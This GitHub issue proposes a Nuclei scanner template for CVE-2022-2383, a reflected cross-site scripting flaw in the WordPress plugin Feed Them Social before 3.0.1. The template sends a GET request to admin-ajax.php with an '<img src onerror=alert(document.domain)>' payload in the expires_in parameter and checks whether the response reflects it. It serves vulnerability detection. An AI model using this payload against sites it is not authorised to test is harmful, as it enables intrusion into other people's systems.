### ISSUE TITLE
CVE-2022-2383 - Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#5206]
```yaml
id: CVE-2022-2383

info:
  name: Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting
  author: akincibor
  severity: medium
  description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(document.domain)><br/>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
